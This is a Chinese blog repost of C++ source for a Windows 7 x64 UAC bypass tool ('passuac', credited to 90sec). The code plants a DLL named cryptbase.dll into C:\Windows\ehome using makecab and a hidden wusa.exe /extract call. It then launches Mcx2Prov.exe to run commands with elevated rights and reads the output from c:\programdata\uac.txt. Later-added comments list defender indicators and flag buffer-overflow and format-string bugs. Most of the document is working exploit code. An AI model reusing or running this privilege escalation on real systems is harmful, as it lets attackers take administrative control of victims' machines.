
WIN7 X64 PASSUAC 源码


// Passuac.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
#include  <direct.h>

// Does the current user's account belong to the local Administrators group?
//
// Unlike IsRunAsAdmin(), this answers a question about the *account*, not the
// running process: on Vista+ (major version >= 6) a UAC-filtered token is
// followed to its linked, unfiltered token before the membership test, so an
// administrator running unelevated still gets TRUE here.
//
// Returns TRUE only when CheckTokenMembership positively confirms membership.
// Any API failure on the way yields FALSE; the caller cannot tell "not a
// member" apart from "the check failed".
BOOL IsUserInAdminGroup()
{
    BOOL isMember = FALSE;
    HANDLE procToken = NULL;
    HANDLE tokenToTest = NULL;
    DWORD returned = 0;
    BYTE adminsSid[SECURITY_MAX_SID_SIZE];

    OSVERSIONINFO version = {0};
    version.dwOSVersionInfoSize = sizeof(version);

    // Single-exit structure: every failure breaks out to the handle cleanup below.
    do
    {
        if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_DUPLICATE, &procToken))
            break;
        if (!GetVersionEx(&version))
            break;

        if (version.dwMajorVersion >= 6)
        {
            // A "limited" elevation type means UAC has filtered this token;
            // the full-rights token is reachable through TokenLinkedToken.
            TOKEN_ELEVATION_TYPE elevation;
            if (!GetTokenInformation(procToken, TokenElevationType, &elevation, sizeof(elevation), &returned))
                break;
            if (elevation == TokenElevationTypeLimited
                && !GetTokenInformation(procToken, TokenLinkedToken, &tokenToTest, sizeof(tokenToTest), &returned))
                break;
        }

        // No linked token obtained (pre-Vista, or not a limited token):
        // CheckTokenMembership wants an impersonation token, so duplicate the
        // process token at identification level.
        if (tokenToTest == NULL
            && !DuplicateToken(procToken, SecurityIdentification, &tokenToTest))
            break;

        // BUILTIN\Administrators as a well-known SID; `returned` is reused as
        // the in/out size parameter here.
        returned = sizeof(adminsSid);
        if (!CreateWellKnownSid(WinBuiltinAdministratorsSid, NULL, &adminsSid, &returned))
            break;
        if (!CheckTokenMembership(tokenToTest, &adminsSid, &isMember))
            break;
    } while (0);

    if (procToken)
        CloseHandle(procToken);
    if (tokenToTest)
        CloseHandle(tokenToTest);
    return isMember;
}

// Is the *current* token (the one this process actually runs with) a member of
// the local Administrators group?
//
// This is the "am I elevated right now" test. Under UAC a filtered admin token
// is expected to answer FALSE here while IsUserInAdminGroup() answers TRUE;
// main() relies on exactly that difference.
//
// Returns TRUE when CheckTokenMembership confirms membership, FALSE otherwise
// (including on any API failure). The last-error code is captured locally but
// never surfaced to the caller.
BOOL IsRunAsAdmin()
{
    BOOL elevated = FALSE;
    DWORD lastError = ERROR_SUCCESS;
    PSID adminsSid = NULL;
    SID_IDENTIFIER_AUTHORITY ntAuthority = SECURITY_NT_AUTHORITY;

    // Build BUILTIN\Administrators from its two sub-authorities
    // (SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS).
    BOOL ok = AllocateAndInitializeSid(&ntAuthority,
                                       2,
                                       SECURITY_BUILTIN_DOMAIN_RID,
                                       DOMAIN_ALIAS_RID_ADMINS,
                                       0, 0, 0, 0, 0, 0,
                                       &adminsSid);
    if (ok)
    {
        // NULL token: the calling thread's impersonation token, or the
        // process token when the thread is not impersonating.
        ok = CheckTokenMembership(NULL, adminsSid, &elevated);
    }
    if (!ok)
    {
        lastError = GetLastError();
    }

    if (adminsSid != NULL)
    {
        FreeSid(adminsSid);
    }
    return elevated;
}

// Step 1 of the listing ("passuac"): plants a DLL into a Windows system directory
// without the process itself ever holding an elevated token.
//
// What the visible code does, in order:
//   1. writes the DLL embedded as resource IDR_TESTDLL1 (the id comes from the
//      project's resource header, which is not part of this listing) to
//      cryptbase.dll in the current working directory;
//   2. packs it into cryptbase.tmp with makecab.exe via system();
//   3. launches a hidden wusa.exe with "/extract:C:\Windows\ehome\", which
//      performs the privileged copy;
//   4. deletes the two local files.
//
// Returns 0 only when the local cryptbase.dll cannot be created; every later
// step is unchecked, so `true` is returned even if nothing was actually planted.
//
// Defender notes: the observable chain is a cryptbase.dll/.tmp pair appearing in
// a user-writable directory, a cmd.exe -> makecab.exe child of this process, and
// a hidden wusa.exe whose command line contains "/extract:" pointing under
// C:\Windows. Only the local copies are removed afterwards; the copy in
// C:\Windows\ehome\ remains. The /extract switch is reported to have been removed
// from wusa.exe in Windows 10 — confirm against the build in question; the listing
// targets Windows 7 x64.
BOOL writedll64()
{

    char Szpath[MAX_PATH] = {0};
    char uacexqute[1024] = {0};
    DWORD   dwWrite=0;
    WORD wResID;
    // Created relative to the current working directory, not next to the exe.
    HANDLE  hFile = CreateFileA("cryptbase.dll",GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
    if (hFile == INVALID_HANDLE_VALUE)
    {
        // NOTE(review): GetLastError() returns a DWORD; "%d" should be "%lu".
        printf("Getlasterror:%d.\r\n",GetLastError());
        return 0;
    }
    // NOTE(review): hrsc/hG/dwSize are never checked; a missing resource makes
    // WriteFile receive a NULL buffer and the failure is silent.
    HRSRC hrsc = FindResource(NULL,MAKEINTRESOURCE(IDR_TESTDLL1),L"TESTDLL");
    HGLOBAL hG = LoadResource(NULL, hrsc);
    DWORD   dwSize = SizeofResource( NULL,  hrsc); 

    // The HGLOBAL is passed straight to WriteFile as the data pointer (no
    // LockResource call); this relies on Win32 returning the resource bytes
    // directly — presumably fine in practice, but undocumented as a contract.
    WriteFile(hFile,hG,dwSize,&dwWrite,NULL); 
    CloseHandle( hFile );

    // NOTE(review): neither getcwd() nor strcat() is bounds-checked; a working
    // directory near MAX_PATH overflows Szpath.
    getcwd(Szpath, MAX_PATH);
    strcat(Szpath,"\\cryptbase.tmp");
    // system() goes through cmd.exe, which is the process-tree indicator above.
    system("makecab cryptbase.dll cryptbase.tmp");
    sprintf(uacexqute,"%s /extract:C:\\Windows\\ehome\\",Szpath);

    // SW_HIDE: no visible window for the wusa.exe run.
    ShellExecuteA(NULL, "open", "wusa.exe", uacexqute, NULL, SW_HIDE);

    //remove("cryptbase*");
    // Local artifacts only; the extracted copy is left in place.
    DeleteFileA("cryptbase.dll");
    DeleteFileA("cryptbase.tmp");

    return true;
}

// Entry point. Two modes selected by argv[1]:
//   "passuac"   -> step 1: writedll64() plants the DLL (see that function);
//   anything else -> step 2: runs C:\windows\ehome\Mcx2Prov.exe with argv[1]
//                  as a quoted argument, waits 4 s, then prints the contents of
//                  c:\programdata\uac.txt — presumably written by the planted DLL
//                  (the accompanying text says the reader must write that DLL).
//
// Both modes require the account to be in Administrators (exit(1) otherwise)
// and only act when the current token is *not* already elevated; when already
// elevated the program silently does nothing.
//
// Defender notes: Mcx2Prov.exe launched hidden from C:\windows\ehome with a
// quoted command-line argument, and a c:\programdata\uac.txt being created and
// read shortly afterwards, are the indicators this step leaves behind.
int main(int argc,char* argv[])
{
    FILE* fp;
    char szcmd[1024] = {0};
    char *Options;
    char buffer[2048] = {0};
    // si/pi are set up but never used: CreateProcess is not called anywhere here.
    STARTUPINFO si={sizeof(si)};
    PROCESS_INFORMATION pi;
    si.dwFlags=STARTF_USESHOWWINDOW;
    si.wShowWindow=TRUE;


    if (argc < 2)
    {
        printf("[*]:%s Passuac for windows 7 x64\n",argv[0]);
        printf("[*]:%s Setp1: passuac\r\n",argv[0]);
        printf("[*]:%s Setp2: shell_cmd\r\n",argv[0]);
        printf("[*]:Welcome to www.90sec.org\r\n");
        printf("[*]:Pass uac t00ls By:@90sec\r\n\r\n");
        return 0;
    }

    // NOTE(review): unbounded copy of argv[1] into a 1024-byte buffer.
    strcpy(szcmd,argv[1]);

    // NOTE(review): wsprintfA caps output at 1024 characters, not at the
    // MAX_PATH-sized destination, so a long argv[1] overruns szNewCmd.
    char szNewCmd[MAX_PATH] = {0};
    wsprintfA(szNewCmd, "\"%s\"", szcmd);


    if (!IsUserInAdminGroup())
    {
        printf("Your not have in Local Administrator Group\r\n");
        printf("Program exit;");
        exit(1);
    }else
    {
        printf("Your have in Local Administrator Group\r\n");
        printf("PassUac ing.....\r\n");
        // Only a filtered (unelevated) admin token proceeds past this point.
        if (!IsRunAsAdmin())
        {
            if (!strcmp(szcmd,"passuac"))
            {
                writedll64();
            }else
            {
                
                ShellExecuteA(NULL, "open", "C:\\windows\\ehome\\Mcx2Prov.exe", szNewCmd, NULL, SW_HIDE);
                // Fixed 4 s wait instead of synchronising with the child.
                Sleep(4000);

                fp = fopen("c:\\programdata\\uac.txt","rb");
                if (fp == NULL)
                {
                    // NOTE(review): fopen is CRT and reports via errno;
                    // GetLastError() may be stale here. "%d" vs DWORD as well.
                    printf("Getlasterror:%d\r\n",GetLastError());
                    return 0;
                }

                ZeroMemory(buffer,sizeof(buffer));

                while (fgets(buffer,sizeof(buffer),fp))
                {
                    // NOTE(review): file contents used as the format string
                    // (CERT FIO30-C); any '%' directive in uac.txt is interpreted.
                    // `fputs(buffer, stdout);` prints the line safely.
                    printf(buffer);
                }
                fclose(fp);
            }
        }
    }
    return 0;
}

需要自己写个DLL,来进行参数解析。请看代码吧。

代码写得相当烂,但是能够达到目的,还请各位莫笑话。


原文地址:http://www.cnblogs.com/killbit/p/4787657.html
